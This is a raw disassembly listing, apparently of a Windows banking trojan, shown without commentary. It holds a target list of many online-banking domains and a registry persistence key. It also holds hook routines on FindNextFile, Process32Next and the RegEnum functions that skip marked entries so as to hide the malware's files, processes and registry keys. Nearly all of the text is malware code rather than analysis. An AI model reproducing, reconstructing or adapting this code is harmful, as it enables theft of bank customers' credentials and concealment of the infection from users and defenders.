dd offset aChechenpress_i ; "chechenpress.info"
dd offset aProdexteam_n_1 ; "prodexteam.net"
dd offset aProdexteam_net ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_0 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aKavkazcenter_c ; "kavkazcenter.com/russ"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 75h, 44h, 0
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
dd 2E716E4Ah
db 0
; char SubKey[]
SubKey db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_4098A8+5A0�o
; sub_4098A8+68F�o ...
aK db 'K',0
; char ValueName[]
ValueName db 'ofstkkq',0 ; DATA XREF: sub_4098A8+59B�o
; sub_4098A8+68A�o
db 0
; char aOfstkkqc[]
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_4098A8+6E3�o
; sub_4098A8+898�o
dd 0
dword_43C21C dd 0 ; sub_40B3E8:loc_40B57B�r ...
; HWND dword_43C220
dword_43C220 dd 0 ; sub_40B3E8+A9�r ...
dd 20533E44h, 743F46h
dword_43C22C dd 727C21h dword_43C230 dd 38h ; sub_401D31+96�w ...
dd 3, 0Eh
dword_43C23C dd 0 ; .text:loc_40145B�r ...
dd 1, 0Dh
dword_43C248 dd 0 ; .text:loc_40159D�r ...
dd 2, 10h
dword_43C254 dd 0 ; .text:loc_4016D6�r ...
dd 6, 0Ch
dword_43C260 dd 0 ; .text:loc_4017B4�r ...
dword_43C264 dd 354B5Eh dword_43C268 dd 252C366Fh, 38h, 5, 0Ahdword_43C278 dd 0 ; .text:loc_40193B�r ...
aVlvh_ db 'vlVh_',0 ; DATA XREF: .text:004019AB�o
align 4
dd 5, 0Fh
dword_43C28C dd 0 ; .text:loc_401A1D�r ...
word_43C290 dw 2Ah ; DATA XREF: sub_401A7E+37�r
dword_43C292 dd 707C44h align 4
dd 0
dd 0Bh
dword_43C2A0 dd 0 ; .text:loc_401B47�r ...
word_43C2A4 dw 4Ah ; DATA XREF: sub_401BB7+9�r
word_43C2A6 dw 7146h ; DATA XREF: sub_401BB7+D4�o
dd 42506347h, 3Ah, 2, 0Ah
dword_43C2B8 dd 0 ; .text:loc_401CCE�r ...
word_43C2BC dw 20h ; DATA XREF: sub_401D31+1D�r
word_43C2BE dw 3851h ; DATA XREF: sub_401D31+13A�o
dd 7A8161h
dword_43C2C4 dd 493C253Eh, 68hoff_43C2CC dd offset loc_401DBB ; DATA XREF: sub_401D31+7E�r
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_401F8C
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401E2D
dd offset loc_401E2D
dd offset loc_401EB0
dd offset loc_401ED6
dd offset loc_401F5A
dd offset loc_401F20
dd offset loc_401E1C
dd offset loc_401F0E
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401F0E
dd offset loc_401F20
dd offset loc_401F0E
dd offset loc_401F0E
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
off_43C4FC dd offset loc_401DBB ; DATA XREF: sub_401D31+291�r
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401F37
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401F4A
dd offset loc_401F4A
dd offset loc_401F4A
dd offset loc_401F4A
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E1C
dd offset loc_401F5A
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F0E
dd offset loc_401F0E
dd offset loc_401F70
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401F0E
dd offset loc_401F20
dd offset loc_401F7C
dd offset loc_402002
dd offset loc_401F70
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DCD
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F37
dd offset loc_401E1C
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E58
dd offset loc_401F85
dd offset loc_401E85
dd offset loc_401E85
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DE8
dd offset loc_401DE8
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
off_43C6CC dd offset loc_401FCE ; DATA XREF: sub_401D31+27C�r
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401FCE
dd offset loc_401FEC
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401FCE
dd offset loc_401FEC
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FEC
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C85B: ; CODE XREF: .text:0043C8A4�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CA68h
test eax, eax
jz short loc_43C8A6
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C875: ; CODE XREF: .text:0043C87B�j
cmp byte ptr [ebx], 0
jz short loc_43C87D
inc ebx
jmp short loc_43C875
; ---------------------------------------------------------------------------
loc_43C87D: ; CODE XREF: .text:0043C878�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD49Eh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43C8A3
popa
jmp short loc_43C8A6
; ---------------------------------------------------------------------------
loc_43C8A3: ; CODE XREF: .text:0043C89E�j
popa
jmp short loc_43C85B
; ---------------------------------------------------------------------------
loc_43C8A6: ; CODE XREF: .text:0043C868�j
; .text:0043C8A1�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C8DC: ; CODE XREF: .text:0043C92B�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CAE9h
test eax, eax
jz short loc_43C92D
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C8F6: ; CODE XREF: .text:0043C8FE�j
cmp word ptr [ebx], 0
jz short loc_43C900
inc ebx
inc ebx
jmp short loc_43C8F6
; ---------------------------------------------------------------------------
loc_43C900: ; CODE XREF: .text:0043C8FA�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D625h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43C92A
popa
jmp short loc_43C92D
; ---------------------------------------------------------------------------
loc_43C92A: ; CODE XREF: .text:0043C925�j
popa
jmp short loc_43C8DC
; ---------------------------------------------------------------------------
loc_43C92D: ; CODE XREF: .text:0043C8E9�j
; .text:0043C928�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_43C940 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .text:0043CE8C�o
dd 616D726Fh, 6E6F6974h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C95D proc near ; DATA XREF: .text:0043CE94�o
var_68 = byte ptr -68h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+24h+var_1C], edi
mov [esp+24h+var_20], esi
mov [esp+24h+var_24], ebx
sub esp, 10h
mov eax, [ebp+arg_C]
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_4]
mov [esp+34h+var_28], eax
mov [esp+34h+var_2C], edi
mov [esp+34h+var_30], ebx
mov esi, [ebp+arg_0]
mov [esp+34h+var_34], esi
call near ptr 245CB93h
mov [ebp+var_4], eax
cmp esi, 5
jz short loc_43C9AD
loc_43C999: ; CODE XREF: sub_43C95D+56�j
; sub_43C95D+A9�j
mov eax, [ebp+var_4]
mov ebx, [esp+24h+var_24]
mov esi, [esp+24h+var_20]
mov edi, [esp+24h+var_1C]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_43C9AD: ; CODE XREF: sub_43C95D+3A�j
cmp edi, 1F40h
jle short loc_43C999
jmp short loc_43C9BB
; ---------------------------------------------------------------------------
loc_43C9B7: ; CODE XREF: sub_43C95D+AB�j
mov esi, ebx
loc_43C9B9: ; CODE XREF: sub_43C95D+A3�j
add ebx, eax
loc_43C9BB: ; CODE XREF: sub_43C95D+58�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43C9C9: ; CODE XREF: sub_43C95D+7F�j
bt eax, ebx
jb short loc_43C9D4
mov [esp+ebx+68h+var_68], 30h
jmp short loc_43C9D8
; ---------------------------------------------------------------------------
loc_43C9D4: ; CODE XREF: sub_43C95D+6F�j
mov [esp+ebx+68h+var_68], 31h
loc_43C9D8: ; CODE XREF: sub_43C95D+75�j
inc ebx
cmp ebx, 20h
jnz short loc_43C9C9
push esp
call near ptr 0C4FD5F0h
add esp, 24h
test ax, ax
jnz short loc_43C9EF
popa
jmp short loc_43CA02
; ---------------------------------------------------------------------------
loc_43C9EF: ; CODE XREF: sub_43C95D+8D�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_43C9FE
mov dword ptr [esi], 0
jmp short loc_43CA02
; ---------------------------------------------------------------------------
loc_43C9FE: ; CODE XREF: sub_43C95D+97�j
add [esi], eax
jmp short loc_43C9B9
; ---------------------------------------------------------------------------
loc_43CA02: ; CODE XREF: sub_43C95D+90�j
; sub_43C95D+9F�j
mov eax, [ebx]
test eax, eax
jz short loc_43C999
jmp short loc_43C9B7
sub_43C95D endp
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .text:off_43CE7C�o
word_43CA1E dw 8360h ; DATA XREF: .text:off_43CE84�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43CA66: ; CODE XREF: .text:0043CAB4�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 245CC7Dh
test eax, eax
jz short loc_43CAB6
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43CA8D: ; CODE XREF: .text:0043CAA0�j
bt eax, ebx
jb short loc_43CA98
mov byte ptr [esp+ebx], 30h
jmp short loc_43CA9C
; ---------------------------------------------------------------------------
loc_43CA98: ; CODE XREF: .text:0043CA90�j
mov byte ptr [esp+ebx], 31h
loc_43CA9C: ; CODE XREF: .text:0043CA96�j
inc ebx
cmp ebx, 20h
jnz short loc_43CA8D
push esp
call near ptr 0C4FD6B4h
add esp, 24h
test ax, ax
jnz short loc_43CAB3
popa
jmp short loc_43CAB6
; ---------------------------------------------------------------------------
loc_43CAB3: ; CODE XREF: .text:0043CAAE�j
popa
jmp short loc_43CA66
; ---------------------------------------------------------------------------
loc_43CAB6: ; CODE XREF: .text:0043CA7D�j
; .text:0043CAB1�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CADC: ; CODE XREF: .text:0043CB29�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CCEFh
test eax, eax
jnz short loc_43CB2B
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CAF7: ; CODE XREF: .text:0043CAFD�j
cmp byte ptr [ebx], 0
jz short loc_43CAFF
inc ebx
jmp short loc_43CAF7
; ---------------------------------------------------------------------------
loc_43CAFF: ; CODE XREF: .text:0043CAFA�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD720h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CB25
popa
jmp short loc_43CB2B
; ---------------------------------------------------------------------------
loc_43CB25: ; CODE XREF: .text:0043CB20�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CADC
; ---------------------------------------------------------------------------
loc_43CB2B: ; CODE XREF: .text:0043CAEF�j
; .text:0043CB23�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CB44: ; CODE XREF: .text:0043CB97�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CD57h
test eax, eax
jnz short loc_43CB99
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CB5F: ; CODE XREF: .text:0043CB67�j
cmp word ptr [ebx], 0
jz short loc_43CB69
inc ebx
inc ebx
jmp short loc_43CB5F
; ---------------------------------------------------------------------------
loc_43CB69: ; CODE XREF: .text:0043CB63�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D88Eh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CB93
popa
jmp short loc_43CB99
; ---------------------------------------------------------------------------
loc_43CB93: ; CODE XREF: .text:0043CB8E�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CB44
; ---------------------------------------------------------------------------
loc_43CB99: ; CODE XREF: .text:0043CB57�j
; .text:0043CB91�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_43CBA0 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CBB1 proc near ; DATA XREF: .text:0043CEE4�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
loc_43CBB4: ; CODE XREF: sub_43CBB1+7E�j
mov eax, [ebp+arg_C]
push dword ptr [eax]
mov eax, [ebp+arg_18]
test eax, eax
jz short loc_43CBC2
push dword ptr [eax]
loc_43CBC2: ; CODE XREF: sub_43CBB1+D�j
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call near ptr 245CDE1h
test eax, eax
jnz short loc_43CC31
pusha
mov eax, [ebp+arg_8]
mov ebx, eax
loc_43CBE9: ; CODE XREF: sub_43CBB1+40�j
cmp word ptr [ebx], 0
jz short loc_43CBF3
inc ebx
inc ebx
jmp short loc_43CBE9
; ---------------------------------------------------------------------------
loc_43CBF3: ; CODE XREF: sub_43CBB1+3C�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D918h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CC1D
popa
jmp short loc_43CC31
; ---------------------------------------------------------------------------
loc_43CC1D: ; CODE XREF: sub_43CBB1+67�j
popa
inc [ebp+arg_4]
mov eax, [ebp+arg_18]
test eax, eax
jz short loc_43CC2A
pop dword ptr [eax]
loc_43CC2A: ; CODE XREF: sub_43CBB1+75�j
mov eax, [ebp+arg_C]
pop dword ptr [eax]
jmp short loc_43CBB4
; ---------------------------------------------------------------------------
loc_43CC31: ; CODE XREF: sub_43CBB1+30�j
; sub_43CBB1+6A�j
add esp, 4
cmp [ebp+arg_18], 0
jz short loc_43CC3D
add esp, 4
loc_43CC3D: ; CODE XREF: sub_43CBB1+87�j
pop ebp
retn 20h
sub_43CBB1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CC58: ; CODE XREF: .text:0043CCCD�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CC66
push dword ptr [eax]
loc_43CC66: ; CODE XREF: .text:0043CC62�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CE85h
test eax, eax
jnz short loc_43CCCF
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CC8D: ; CODE XREF: .text:0043CC93�j
cmp byte ptr [ebx], 0
jz short loc_43CC95
inc ebx
jmp short loc_43CC8D
; ---------------------------------------------------------------------------
loc_43CC95: ; CODE XREF: .text:0043CC90�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD8B6h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CCBB
popa
jmp short loc_43CCCF
; ---------------------------------------------------------------------------
loc_43CCBB: ; CODE XREF: .text:0043CCB6�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CCC8
pop dword ptr [eax]
loc_43CCC8: ; CODE XREF: .text:0043CCC4�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CC58
; ---------------------------------------------------------------------------
loc_43CCCF: ; CODE XREF: .text:0043CC85�j
; .text:0043CCB9�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43CCDB
add esp, 4
loc_43CCDB: ; CODE XREF: .text:0043CCD6�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_43CCE0 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 57h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CCF3 proc near ; DATA XREF: .text:0043CF04�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
loc_43CCF6: ; CODE XREF: sub_43CCF3+7E�j
mov eax, [ebp+arg_C]
push dword ptr [eax]
mov eax, [ebp+arg_1C]
test eax, eax
jz short loc_43CD04
push dword ptr [eax]
loc_43CD04: ; CODE XREF: sub_43CCF3+D�j
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call near ptr 245CF23h
test eax, eax
jnz short loc_43CD73
pusha
mov eax, [ebp+arg_8]
mov ebx, eax
